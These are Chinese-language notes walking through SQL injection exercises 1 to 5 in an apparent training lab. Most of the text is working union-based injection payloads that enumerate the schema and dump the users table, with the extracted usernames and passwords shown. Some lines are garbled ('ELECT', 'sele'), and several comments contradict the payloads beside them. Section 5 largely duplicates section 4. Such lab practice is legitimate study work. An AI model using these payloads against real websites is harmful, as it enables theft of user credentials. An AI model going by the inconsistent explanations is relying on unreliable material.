SQL注入1-5题
ELECT VERSION() -- mysql版本
SELECT USER() -- mysql数据库的用户名
SELECT DATABASE() -- 当前数据库
SELECT *,schema_name FROM schemata -- 当前用户拥有的所有的数据库的名字,schema_name
SELECT * FROM TABLES -- 当前用户拥有的所有数据库及其库下面的表的名字,table_schema,tablename
SELECT * FROM COLUMNS -- 当前用户拥有的所有数据库及其库下面的表的名字,及表下面的字段的名字
(1).获取所有账号密码 有引号
- 获取访问数据源列数
?id=1 order by 3 --+ //看是否访问出值,存在表示列数存在
sele user,pass from table where id='1' order by 3 --+ imint 0.1 //--+ 将后面的imint进行一个注释
- 获取账号和密码所在列
?id=' union select 1,2,3 --+ // ' 强行闭合放空
- 获取所在的库库名(爆库)
- 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
//Your Login name:emails,referers,uagents,users 找出来的表
- 获取表下面的列,查看是否正确
?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
//Your Login name:id,username,password 拿到想要的结果,确定了表
- 获取所有密码和账号
?id=' union select 1,group_concat(username),group_concat(password) from users --+
Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
//拿到所需要的账号和密码
(2).获取所有账号密码 无引号
- 获取访问数据源列数
?id=1 order by 3 --+ //看是否访问出值,存在表示列数存在
sele user,pass from table where id='1' order by 3 --+ imint 0.1
//--+ 将后面的imint进行一个注释 因为id为数字型,没有单引号括着
- 获取账号和密码所在列
?id='' union select 1,2,3 --+
//数字型放空直接两个单引号
- 获取所在的库库名(爆库)
- 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
//Your Login name:emails,referers,uagents,users 找出来的表
- 获取表下面的列,查看是否正确
?id='' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
//Your Login name:id,username,password 拿到想要的结果,确定了表
- 获取所有密码和账号
?id='' union select 1,group_concat(username),group_concat(password) from users --+
Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
//拿到所需要的账号和密码
(3).获取所有账号密码 存在括号和单引号
- 获取访问数据源列数
?id=1 order by 3 --+ //看是否访问出值,存在表示列数存在
//--+ 将后面的imint进行一个注释 因为id为数字型,所以这里不需要存在闭合
- 获取账号和密码所在列
?id=') union select 1,2,3 --+
//数字型放空直接两个单引号
?id='') union select 1,2,3 --+ //可以运行但是无结果,因为括号单引号和外闭合
- 获取所在的库库名(爆库)
- 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
//Your Login name:emails,referers,uagents,users 找出来的表
- 获取表下面的列,查看是否正确
?id=') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
//Your Login name:id,username,password 拿到想要的结果,确定了表
- 获取所有密码和账号
?id=') union select 1,group_concat(username),group_concat(password) from users --+
Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
//拿到所需要的账号和密码
(4)获取所有账号密码 双引号与括号
- 获取访问数据源列数
?id=1") order by 3 --+ //看是否访问出值,存在表示列数存在
//--+ 将后面的imint进行一个注释 因为存在双引号和括号,需要对应才可以得到内容
- 获取账号和密码所在列
?id=") union select 1,2,3 --+
//数字型放空直接两个单引号
- 获取所在的库库名(爆库)
- 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
//Your Login name:emails,referers,uagents,users 找出来的表
- 获取表下面的列,查看是否正确
?id=") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
//Your Login name:id,username,password 拿到想要的结果,确定了表
- 获取所有密码和账号
?id=") union select 1,group_concat(username),group_concat(password) from users --+
Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
//拿到所需要的账号和密码
(5)获取所有账号密码
- 获取访问数据源列数
?id=1") order by 3 --+ //看是否访问出值,存在表示列数存在
//--+ 将后面的imint进行一个注释 因为存在双引号和括号,需要对应才可以得到内容
- 获取账号和密码所在列
?id=") union select 1,2,3 --+
//数字型放空直接两个单引号
- 获取所在的库库名(爆库)
- 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
//Your Login name:emails,referers,uagents,users 找出来的表
- 获取表下面的列,查看是否正确
?id=") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
//Your Login name:id,username,password 拿到想要的结果,确定了表
- 获取所有密码和账号
?id=") union select 1,group_concat(username),group_concat(password) from users --+
Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
//拿到所需要的账号和密码